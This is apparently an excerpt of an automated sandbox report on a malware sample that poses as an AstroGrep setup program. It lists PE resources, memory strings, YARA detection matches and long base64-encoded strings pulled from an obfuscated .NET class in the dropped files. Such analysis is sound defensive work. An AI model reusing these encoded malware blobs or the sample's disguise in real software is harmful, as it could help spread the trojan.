                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXECode function: 5_2_004048C55_2_004048C5
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXECode function: 5_2_004064CB5_2_004064CB
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXECode function: 5_2_00406CA25_2_00406CA2
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeCode function: 13_2_00EA814813_2_00EA8148
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeCode function: 13_2_00EAE5B013_2_00EAE5B0
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeCode function: 13_2_00EA787813_2_00EA7878
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeCode function: 13_2_00EA713013_2_00EA7130
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeCode function: 13_2_00EACD6013_2_00EACD60
                            Source: ms.exeStatic PE information: Resource name: RBIND type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: ms.exeStatic PE information: Resource name: RBIND type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                            Source: ms.exeStatic PE information: Resource name: RBIND type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                            Source: ms.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: ms.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: ms.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: ASTROGREP_SETUP_V4.4.7.EXE.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: ASTROGREP_SETUP_V4.4.7.EXE.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: ASTROGREP_SETUP_V4.4.7.EXE.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: AstroGrep.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: ms.exe, 00000001.00000002.200160111.0000000002430000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs ms.exe
                            Source: ms.exe, 00000001.00000002.199948307.00000000009F0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs ms.exe
                            Source: ms.exe, 00000001.00000002.199948307.00000000009F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs ms.exe
                            Source: ms.exeBinary or memory string: OriginalFilenameStub.exe" vs ms.exe
                            Source: ms.exeBinary or memory string: OriginalFilenameAstroGrep_Setup_v4.4.7.exe@ vs ms.exe
                            Source: ms.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                            Source: ms.exe, type: SAMPLEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
                            Source: 1.0.ms.exe.a30000.0.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
                            Source: 1.2.ms.exe.a30000.1.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
                            Source: ASTRO-GREP.EXE.1.dr, zElUlVwqERLYn/eHcZPkAtyHA.csBase64 encoded string: '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
                            Source: astro-grep.exe.3.dr, zElUlVwqERLYn/eHcZPkAtyHA.csBase64 encoded string: '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
                            Source: 3.0.ASTRO-GREP.EXE.5f0000.0.unpack, zElUlVwqERLYn/eHcZPkAtyHA.csBase64 encoded string: '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
                            Source: 3.2.ASTRO-GREP.EXE.5f0000.0.unpack, zElUlVwqERLYn/eHcZPkAtyHA.csBase64 encoded string: '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
                            Source: 13.2.astro-grep.exe.770000.0.unpack, zElUlVwqERLYn/eHcZPkAtyHA.csBase64 encoded string: 'QHy8sfXkGmhL4GfCIxO4J1WB7dWaURp1TcEzVJkn3+Ahjg1xP+UJRRGNLO2H1f8OBBUg1zZFbOawMqFIJs9TzA==', 'NGowqIIaRfZK9xE4MaYAMZJNSBiADXG98tScxjas+TYluA/Nyk7JqsIeKhWHRmXvZLhCzwhMhg58B1Wf4D6HcA==', 'R3oLaKXfDr6rAO99i7NEiwrOhtYr7FQkF66mH80NeUrbSGM+wSwyQY2Bz8neKR3fz49dNiaC8H/QRRz9YPVBEA==', 'RvqIMWuetijphaJZAJE6FoIGlFfHd25BS7fS+/kn3XyLxV5NuiPDP84jJByv/aNjcL32QvZRFQOVa9fjv0ooG5j+NGJ1TRck/hQaLqAr0a96bejTy0gL0EM+fafDTGfBnpIy3rL4eZ3f5vWEwIkP5XpbjlLWdXOw5JoUho71glN6elqv9tRnzekVw6QYg8KU/otB6KhQaIusTJFZKxYCRNlNumfruS1uyjAuGcEvFJJbcshDtsaDTx2ie05B51ZKmui01EZaQanWQIUbgwIWImfXD+Rx0Kxw8abxib/OnZ3wss8k62VXgzXiU1pEDwMGzrWCoqzDd1xct9tMaVj5T2rRQXNJQTuxij2Ad1muU/o4NID8d7DUfS0RBQg1LhXEfwvlTigh547Pji4H5EeUWudKWRWbylJcz3lLIKeOYMtthSboq9mgEg4UZWiG3a0dKkpR9PGSIdAvaLX78GyZR5TibIs42NRyBLkMRlwa8Awo/EXCZRHKKHndGehExORa3FHp9Y7gmFLK9XNaMMM27XaZUPbOdtv//APfKv2ZgLnzkSMmqS7RaH5wTGSHg9bbn5qOzKHCjaHF3XzpV5evIVcid9KGy8KMvhPo/e7ngbpQODVrG7rWZ5jAkxY1RtFAUvXXppD4ZQG+CGu0ve80tNU/dIVHWI6J74kY1h6draQh+zLrO63jzLO2szPMs4NcrkmMSbyDJuTV5upHFtQTHEWn5NENVUlmYlJ6TKa+s//A3iAZYjuvrXC49N8rcL1SO9rbwRyV03Hb11LVlwxo+vw2CNsDQcUshL3DbU3G3ZUtoM9pd3yORe5TrOOHAW/YPjKiNIulAz1F5c98QRABd147y8uNmOmEbwG69p92AtKMHm+BBQ4L65yjFchPEu7LDz2I7OyiI4bx4ex9tYYCdoRNVmbFKacF5I2wMSD66KbjoJbgqSTVYp4RMa13Um/NCTaRJYbFzlbzoRJdSh+TJ4YAzh3RgjSyDk58OY+hkczehjDruNkypEoeROrhPO7WBtP3kTCTcrc0V7jmBHciZiKGhIEnyE0TZf5b5BMVm